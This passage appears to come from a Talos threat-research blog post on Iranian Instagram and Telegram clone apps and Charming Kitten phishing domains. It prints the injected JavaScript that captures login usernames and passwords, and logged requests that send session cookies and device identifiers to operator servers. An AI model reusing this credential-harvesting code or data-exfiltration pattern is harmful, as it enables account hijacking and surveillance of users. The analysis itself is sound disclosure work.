of users in a specific Telegram channel. All this comes with the guarantee that only Iranian users will perform such actions. The same operator also manages (see previous section) sites like lik3.org, which sells the same kind of exposure.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-PyBlB7MRIss/W-BcdrtCBjI/AAAAAAAAAQw/we8YCX7ieHgfV7mfhmltt2GwhxdGb9vugCK4BGAYYCw/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://3.bp.blogspot.com/-PyBlB7MRIss/W-BcdrtCBjI/AAAAAAAAAQw/we8YCX7ieHgfV7mfhmltt2GwhxdGb9vugCK4BGAYYCw/s640/image5.png" width="640" /></a></div><div style="text-align: center;">Price list (original HTML errors where kept, translation by google.com)</div><br /><div style="text-align: justify;"><div style="text-align: left;">While these services are not illegal, they definitely are "grey" services. On the same site, we can see marketing highlights the benefits of using this service rather than others.</div></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-B7N9nCU_rHM/W-BclIqZoJI/AAAAAAAAAQ4/VdLu5j1Vy-oFWzLyNr0oL-Mm8oHs7ufyQCK4BGAYYCw/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://4.bp.blogspot.com/-B7N9nCU_rHM/W-BclIqZoJI/AAAAAAAAAQ4/VdLu5j1Vy-oFWzLyNr0oL-Mm8oHs7ufyQCK4BGAYYCw/s640/image18.png" width="640" /></a></div><span style="color: red; font-size: 16px; font-weight: bold;"></span><br /><div style="text-align: center;">Lik3.org marketing (translation by google.com)</div><br /><div style="text-align: left;">It's worth noting that the operators state that they will never ask for the customer's password for Instagram and that all of the site's users are real. The reality is that the operator doesn't need the customer's password for Instagram because an Instagram user doesn't need to log into that user's account to "like" their post.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Instead, the operator has access to thousands of user sessions. They have access to all users that have installed the "free" applications, meaning they can do whatever they want during those sessions. While the operator uses a different method for the Telegram applications, those can also lead to complete session takeover. See the "Application examples" section for more details.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The danger here is not that this operator can make money, it's that users' privacy is at risk. The same methods applied to control Instagram and Telegram accounts give the operator access to the user's full contact list, future messages on Telegram, and the user's full Instagram profile. Iran banned the usage of these sites, especially Telegram, since chats can be encrypted, locking out government access. By using these methods, the operator could compromise the endpoint and access all future chats.</div><br /><div style="text-align: left;">Although most of the backend is hosted in Europe, all the tested applications perform an update check against a server located in Iran. Again, this is not malicious per se, but given the context of forbidden applications, this potentially gives the government a single point of access to thousands of mobile devices. However, Talos cannot establish a direct relationship between this operator and any government entity, Iranian or otherwise.<br /><br /></div><b><span style="font-size: small;">Application examples</span></b><br /><b><br /></b><b>Follower Begir Instagram iOS application</b><br /><div><b><br /></b></div>The first application we analyzed was فالوئر بگیر اینستاگرام ("Follower Begir Instagram") designed for iOS. Andromedaa.ir published this application, and it's signed by Cambridge Universal Academy. This application is an overlay to Instagram.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gdkAnQxGRAQ/W-BdCww--lI/AAAAAAAAARM/AEK9TyvyDQg_QTEqpUWo7RvvIHW9KD3sQCK4BGAYYCw/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-gdkAnQxGRAQ/W-BdCww--lI/AAAAAAAAARM/AEK9TyvyDQg_QTEqpUWo7RvvIHW9KD3sQCK4BGAYYCw/s640/image14.png" width="328" /></a></div><div style="text-align: center;">First screen after logging in</div><br />The developer added some features such as virtual currency and Persian language support, among others.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-pSgFDiBi1-U/W-BdLC1M3EI/AAAAAAAAARU/2Rtsi_roM9cR7myxfcyIdVzBcXIP42hPgCK4BGAYYCw/s1600/image21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://3.bp.blogspot.com/-pSgFDiBi1-U/W-BdLC1M3EI/AAAAAAAAARU/2Rtsi_roM9cR7myxfcyIdVzBcXIP42hPgCK4BGAYYCw/s400/image21.png" width="370" /></a></div><div style="text-align: center;">Certificate information</div><br />The application uses the iOS WebKit framework in order to display web content, which in this case displays the Instagram page. Upon the first execution, the application displays the Instagram login page injected with the following JavaScript snippet.<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">document.addEventListener('click', function() {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; try {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tu = document.querySelector('[name="username"]');</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tp = document.querySelector('[name="password"]');</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tpV = (typeof tp == 'undefined') ? '' : tp.value;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tuV = (typeof tu == 'undefined') ? '' : tu.value;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; } catch (err) {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tuV = '';</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; var tpV = ''</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; }</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; var bd = document.getElementsByTagName('body')[0].innerText;</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; var messageToPost = {</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'pu': tuV,</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'pp': tpV,</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; &nbsp; &nbsp; 'bd': bd</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">&nbsp; &nbsp; }; window.webkit.messageHandlers.buttonClicked.postMessage(messageToPost);</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">}, false);</span></blockquote><br /><br /><div style="text-align: left;">The purpose of this code is to give the control to the iOS application when the user clicks the "Connection" button. The application receives an event, and the value of the username and password fields, along with the body of the page. The event is handled by the <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">followerbegir.AuthorizationUserController userController:didReceiveScriptMessage()</span> function. Afterward, the application authenticates on Instagram servers.</div><br />During this investigation, we discovered that the password was not directly sent to the backend server (v1[.]flbgr[.]com). Here is the data sent to the ping.php web page:<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">POST /users/ping.php?m=ios&amp;access=<i>[redacted]</i>&amp;apk=35&amp;imei=<i>[redacted]</i>&amp;user_details=<i>[redacted]</i>&amp;tokenNumber=<i>[redacted]</i> HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: v1.flbgr.com</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">SESSIONID: <i>[redacted]</i></span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: vf1</span><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">IOS: 3361ba9ec3480bcd3766e07cf6b4068a</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept: */*</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Language: fr-fr</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Encoding: gzip, deflate</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Content-Length: 0</span></blockquote><br />The operator of the backend server receives the mobile type (iOS), token and user data, such as username, profile picture and full name, if the account is private.<br /><div style="text-align: left;"><br /></div><div style="text-align: left;">The SESSIONID variable contains the most sensitive information: the header of an Instagram connection with the valid cookie. The owner of the server can hijack the Instagram session of the user with the information available in this field.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application has an update mechanism, which is based out of Iran, unlike the majority of the infrastructure. When the application starts, it sends a request to ndrm[.]ir with the current version of the app:<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">POST /start/fl.php?apk=35&amp;m=ios HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: ndrm.ir</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: vf1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">IOS: 3361ba9ec3480bcd3766e07cf6b4068a</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept: */*</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: %D9%81%D8%A7%D9%84%D9%88%D8%A6%D8%B1%20%D8%A8%DA%AF%D9%8A%D8%B1%20%D8%A7%DB%8C%D9%86%D8%B3%D8%AA%D8%A7%DA%AF%D8%B1%D8%A7%D9%85/35 CFNetwork/893.14.2 Darwin/17.3.0</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Language: en-gb</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Accept-Encoding: gzip, deflate</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Content-Length: 0</span></blockquote><br />If the version is not up to date, the application redirects the user to the andromedaa store:<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ma21Hoyfk1A/W-BefyioVuI/AAAAAAAAARk/0jQtnwDPEEEAVgA-HX7FCBQirT9i5a-ZACK4BGAYYCw/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://2.bp.blogspot.com/-ma21Hoyfk1A/W-BefyioVuI/AAAAAAAAARk/0jQtnwDPEEEAVgA-HX7FCBQirT9i5a-ZACK4BGAYYCw/s640/image6.png" width="300" /></a></div><div style="text-align: center;">Instructions to trust the developer certificate</div><br />The store contains the new version of the application and a procedure to trust the previously mentioned developer certificate. This allows the developers to update both the certificate trust and the application at any point in time.<br /><br /><b> Ozvbegir(ozvdarozv) application</b><br /><br />The Ozvbegir application's intent is to increase the number of members of the user's Telegram channel. This app guarantees that these will only be Iranian users.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cfiPaDxUIfs/W-BfdWjEbMI/AAAAAAAAARw/m-yLMszep5kewpOGtHD_iB7YXYOigxW4gCK4BGAYYCw/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://4.bp.blogspot.com/-cfiPaDxUIfs/W-BfdWjEbMI/AAAAAAAAARw/m-yLMszep5kewpOGtHD_iB7YXYOigxW4gCK4BGAYYCw/s400/image3.png" width="400" /></a></div><div style="text-align: center;">Application description (translation by Google Translate)</div><br />We analyzed the Android version of the application. The application package is signed by a self-signed certificate that's valid until the year 3014.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-186PMeCn5_0/W-BfnkD-AkI/AAAAAAAAAR4/1bMzy3iZtGAPzFkq3Lh4tvny8C7nER9mQCK4BGAYYCw/s1600/image20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="303" src="https://3.bp.blogspot.com/-186PMeCn5_0/W-BfnkD-AkI/AAAAAAAAAR4/1bMzy3iZtGAPzFkq3Lh4tvny8C7nER9mQCK4BGAYYCw/s400/image20.png" width="400" /></a></div><div style="text-align: center;">Most recent Ozvbegir certificate</div><br />Previous versions of the same application also used a self-signed certificate, but both the issuer and the subject information was clearly false.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-81ORxb1e4rc/W-Bf5Pi1xOI/AAAAAAAAASI/HoPeXcCaatAQmlha1W0v3HoeVFBXHvdiQCK4BGAYYCw/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://4.bp.blogspot.com/-81ORxb1e4rc/W-Bf5Pi1xOI/AAAAAAAAASI/HoPeXcCaatAQmlha1W0v3HoeVFBXHvdiQCK4BGAYYCw/s400/image4.png" width="400" /></a></div><div style="text-align: center;">Older version's certificate</div><br />Just like the previous application, the Ozvbegir application is repackaged and includes original classes from the Telegram application.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n3wwYXZVSog/W-Bf8NwvENI/AAAAAAAAASQ/Rt6mtE3jQrYq1bqrje-5gKDmLGrsIznkwCK4BGAYYCw/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-n3wwYXZVSog/W-Bf8NwvENI/AAAAAAAAASQ/Rt6mtE3jQrYq1bqrje-5gKDmLGrsIznkwCK4BGAYYCw/s400/image11.png" width="332" /></a></div><div style="text-align: center;">Ozvbegir classes structure</div><br />In fact, we found signs in the manifest that this package was actually the original Telegram package, which was changed to accommodate the application code. The names and labels used on the manifest have several references to the Telegram original application and even the API key used for the Android Maps app was kept the same.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-K2rLq1OLdeM/W-Bhdgyvt5I/AAAAAAAAASg/SxaCjDQkHMc4pz4hhABfagzn-GTmFpXcwCK4BGAYYCw/s1600/image24.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://4.bp.blogspot.com/-K2rLq1OLdeM/W-Bhdgyvt5I/AAAAAAAAASg/SxaCjDQkHMc4pz4hhABfagzn-GTmFpXcwCK4BGAYYCw/s640/image24.jpg" width="640" /></a></div><div style="text-align: center;"><br />Update check and reply</div><br />Just like the previous application, this one also checks for new versions by performing an HTTP request to the ndrm.ir domain. If the application is not the latest version, it receives both a message and link to obtain the most recent version, which can be anything the operator wants. In this case, it's from cafebazaar.ir, an Iranian Android application store.<br /><br />The domain ndrm.ir is registered under the same email address as all the other application-supporting domains. However, this is the only one that is actually hosted in Iran and coincidently is the one with the ability to upgrade the application on mobile devices.<br /><br />The application has a look and feel that strongly resembles the original Telegram application. Just like the original Telegram application, the user is requested to provide their phone number to register in Telegram when they first open the app.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lGYgYTbf5zw/W-BhhbZ7C4I/AAAAAAAAASo/Hyu_qNC_bn8wn2X6puDJhLecAqZM6JpcQCK4BGAYYCw/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://3.bp.blogspot.com/-lGYgYTbf5zw/W-BhhbZ7C4I/AAAAAAAAASo/Hyu_qNC_bn8wn2X6puDJhLecAqZM6JpcQCK4BGAYYCw/s640/image2.png" width="360" /></a></div><div style="text-align: center;">Phone number request</div><br />This registration creates a shadow session for the same device, giving the application access to the full contact list and future messages.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4njvHgs10kA/W-BhlDB8d4I/AAAAAAAAASw/2rPKBfRg4e44QsV2tGiQgUlz8Qg-FIZtACK4BGAYYCw/s1600/image13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://3.bp.blogspot.com/-4njvHgs10kA/W-BhlDB8d4I/AAAAAAAAASw/2rPKBfRg4e44QsV2tGiQgUlz8Qg-FIZtACK4BGAYYCw/s640/image13.png" width="329" /></a></div><div style="text-align: center;">Sessions created on a single phone</div><br />The application contacts the backend server when the registration process is finished, supplying information about the user and the mobile device.<br /><br /><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">GET /users/ping.php?access_hash=<i>[redacted]</i>&amp;inactive=0&amp;flags=1107&amp;last_name=%21%21empty%21%21&amp;phone=<i>[redacted]</i>&amp;tg_id=<i>[redacted]</i>&amp;m=d&amp;user_name=<i>[redacted]</i>&amp;first_name=Pr2&amp;network=SYMA&amp;country=<i>[redacted]</i>&amp;apk=570&amp;imei=<i>[redacted]</i>&amp;brand=motorola&amp;api=24&amp;version=7.0&amp;model=Moto+G+%285%29&amp;tut=[redacted] HTTP/1.1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">TOKEN: ab1ccf8fd77606dda6bb5ecc858faae1</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">NUM: df27340104277f1e73142224d9cb59e8</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">HEADER: bt6</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">ADMIN: web</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Host: v1.ozvdarozv.com</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">Connection: close</span>&nbsp;</blockquote><blockquote class="tr_bq"><span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">User-Agent: Apache-HttpClient/4.5.1 (java 1.4)</span></blockquote><div><br /></div><br />We identified more than 1 million subscribers on the Telegram channel who automatically joined when they first opened the application.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-tfgxSDCO1yU/W-Bh1taHUgI/AAAAAAAAATE/pX9_6Ekl4o4Hut86ixxbxTsR6pRH3yN9gCK4BGAYYCw/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-tfgxSDCO1yU/W-Bh1taHUgI/AAAAAAAAATE/pX9_6Ekl4o4Hut86ixxbxTsR6pRH3yN9gCK4BGAYYCw/s640/image15.png" width="360" /></a></div><div style="text-align: center;">Channel information</div><br /><b><br /></b> <b>Bitgram_dev</b><br /><br />Bitgram_dev, unlike the previous developers, does not have a large internet footprint. Currently, it has two published applications — AseGram and BitGram — on Google Play. The applications were available from the beginning of September to the beginning of October and were downloaded almost 10,000 times.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-wJlJmmfIfvg/W-Bh6CrPJnI/AAAAAAAAATM/eIO5hw8-_q8MQhrmn2pbUekB4daSzUzXgCK4BGAYYCw/s1600/image19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://2.bp.blogspot.com/-wJlJmmfIfvg/W-Bh6CrPJnI/AAAAAAAAATM/eIO5hw8-_q8MQhrmn2pbUekB4daSzUzXgCK4BGAYYCw/s400/image19.png" width="400" /></a></div><div style="text-align: center;">AseGram and BitGram on Google Play</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-oQj1RqmThDw/W-BiCzL54RI/AAAAAAAAATU/iJUFB6MHIqoup2CsqNxA9E2NI99GNBHFgCK4BGAYYCw/s1600/image23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://3.bp.blogspot.com/-oQj1RqmThDw/W-BiCzL54RI/AAAAAAAAATU/iJUFB6MHIqoup2CsqNxA9E2NI99GNBHFgCK4BGAYYCw/s400/image23.png" width="400" /></a></div><div style="text-align: center;">Publisher information</div><br />Given that AseGram and BitGram aim to circumvent the ban that Iran put on Telegram, it's reasonable to think that the publishers would want to have a small footprint as a self-preservation measure.<br /><br /><h3>Application examples</h3><div><br /></div><b><br /></b> <b> AseGram</b><br /><b><br /></b> <b><br /></b><br />The AseGram application is available on the Google Play store for certain countries. Even though the application was downloaded from the Google Play store, the certificate signing the package is completely useless security-wise.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pDWuJM0nAGI/W-BiIBiB6eI/AAAAAAAAATg/L_cfiSvNaqokCbOAJTmLlDlj672AjvguQCK4BGAYYCw/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://4.bp.blogspot.com/-pDWuJM0nAGI/W-BiIBiB6eI/AAAAAAAAATg/L_cfiSvNaqokCbOAJTmLlDlj672AjvguQCK4BGAYYCw/s640/image8.png" width="611" /></a></div><div style="text-align: center;">AseGram certificate</div><br /><div style="text-align: left;">This Telegram clone was clearly created to intercept all communications from the user. However, this one takes a different approach than the others: This software uses a proxy defined at the Telegram package layer in order to intercept traffic.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ZO0nGP6-8Lo/W-BiR1gWQuI/AAAAAAAAAT0/LYTsLgJIQcsHvGw75seSduY6e70lPaxbgCK4BGAYYCw/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://4.bp.blogspot.com/-ZO0nGP6-8Lo/W-BiR1gWQuI/AAAAAAAAAT0/LYTsLgJIQcsHvGw75seSduY6e70lPaxbgCK4BGAYYCw/s640/image12.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;">Set proxy code</div><br /><br />Just like in previous applications, AseGram is a repackaging of the legitimate Telegram for Android. This technique avoids all the problems that a developer may find when trying to implement its own Telegram client.<br /><br /><div style="text-align: left;">The service <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">org.pouyadr.Service.MyService</span> starts upon boot. This calls the <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">MessagesController.getGlobalMainSettings()</span> from the original Telegram package and will change the settings to include the proxy configuration.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The configuration details are hardcoded into the malware and are encrypted using AES with a key derived from hardcoded values concatenated with package-specific values.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application contacts three domains: talagram.ir, hotgram.ir and harsobh.com, all of which are registered to companies in Iran. In this case, the application administrator has access to the communications.&nbsp;</div><div style="text-align: left;"><br /></div><div style="text-align: left;">This application creates a service that can't be disabled just by closing the application and starts when the device boots up. The service contains the necessary code to install new packages, but the action is handled by the standard package manager in the system. This service is also responsible for contacting IP addresses located in Iran. In fact, this uses the back end of the Telegram clone called "Advanced Telegram," or (Golden Telegram). This application is available at cafebazaa.ir, an Iranian state-sanctioned Android application store.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FSJiVisVaMM/W-BiVcdCMJI/AAAAAAAAAUA/m1sBTrpcN88oF_EAwXJU0VwHVIKoR92mwCK4BGAYYCw/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="352" src="https://2.bp.blogspot.com/-FSJiVisVaMM/W-BiVcdCMJI/AAAAAAAAAUA/m1sBTrpcN88oF_EAwXJU0VwHVIKoR92mwCK4BGAYYCw/s640/image1.png" width="640" /></a></div><div style="text-align: center;"><br />Advanced Telegram cafebazaar page (translation by Google translate)</div><br /><div style="text-align: left;">It is important to emphasize that the first sentence on this page is "این برنامه در چارچوب قوانین کشور فعالیت میکند" ("This program operates within the framework of the laws of the country"). It is hard to find an legitimate use case where an application that circumvents a ban should contact the same servers used by a cloned application that is vetted by the same country that applied the ban, making these communications highly suspicious.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The application also contains code to use socks servers located in several countries, which can be used to circumvent the ban. However, during our research we have never seen these being used. On the other side, if the physical device isn't in Iran, we have seen traffic going to servers located in the country, which doesn't seem compatible with an application that is trying to avoid a ban on Telegram in Iran.</div><h3 id="h.8gnz0y34l4u2">Fake websites</h3><h4>Spoofed Telegram Websites</h4><div style="text-align: left;">The most straightforward approach to gain access to an end user's Telegram account is to socially engineer the user into entering their username and password into a fraudulent website controlled by the attacker. We observed the domain youtubee-videos[.]com in the wild, which mimicked the web login page for Telegram.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-P4OoOGIiVaY/W-BiYi-JQSI/AAAAAAAAAUM/vMby91NWl6MEMGrybbUTJbPoVjWZtYJbACK4BGAYYCw/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://2.bp.blogspot.com/-P4OoOGIiVaY/W-BiYi-JQSI/AAAAAAAAAUM/vMby91NWl6MEMGrybbUTJbPoVjWZtYJbACK4BGAYYCw/s400/image9.png" width="400" /></a></div><div style="text-align: center;">Fake Telegram login page</div><br /><div style="text-align: left;">This domain was registered on July 25, 2017. Based on the tactics, techniques and procedures (TTPs), such as the domain registration pattern, the email address — nami.rosoki@gmail[.]com — used to register this domain, as well as other domains and its passive Domain Name Servers (pDNS) records suggest that this domain is associated with the Charming Kitten group. This same domain was independently associated with Charming Kitten by <a href="https://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf">another cybersecurity firm</a>, Clearsky. Upon further inspection of the web page source code, it appears as though the website was built using the <a href="https://github.com/zhukov/webogram">GitHub project called "Webogram</a><a href="https://github.com/zhukov/webogram">,</a><a href="https://github.com/zhukov/webogram">"</a> there were also strings in the source page to suggest this website's display was designed for iPhones.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-V8pr5vZpJ28/W-BibiW4UnI/AAAAAAAAAUY/jiAKFah6GEkIWX6hkE78A8CyIzdjp6XSwCK4BGAYYCw/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://1.bp.blogspot.com/-V8pr5vZpJ28/W-BibiW4UnI/AAAAAAAAAUY/jiAKFah6GEkIWX6hkE78A8CyIzdjp6XSwCK4BGAYYCw/s640/image17.png" width="640" /></a></div><div style="text-align: center;">Source code, GitHub.com reference<br /><br /></div><h4>Newly identified Charming Kitten domains</h4><div><br /></div>While Talos was researching the spoofed Telegram websites used by the Charming Kitten actors, we discovered a number of other malicious domains that contained keywords such as "mobile," "messenger," and in some cases, "hangouts," Which is likely a reference to the Google chat application called Hangouts. This suggests that these actors had continuous interest in gaining access to end users' mobile devices and specifically their chat messages.<br />These domains were also registered using the same Modus operandi as all the other domains associated with this group in 2017. Through analyzing pDNS records, Talos discovered additional domains that resolved to the same IP address.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-BgOet58G7eA/W-Bv46bv0jI/AAAAAAAAAVE/ldP5hAt3fCUOkbnXCfFhaGaFKzlpK4MxACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.28.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://1.bp.blogspot.com/-BgOet58G7eA/W-Bv46bv0jI/AAAAAAAAAVE/ldP5hAt3fCUOkbnXCfFhaGaFKzlpK4MxACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.28.50.png" 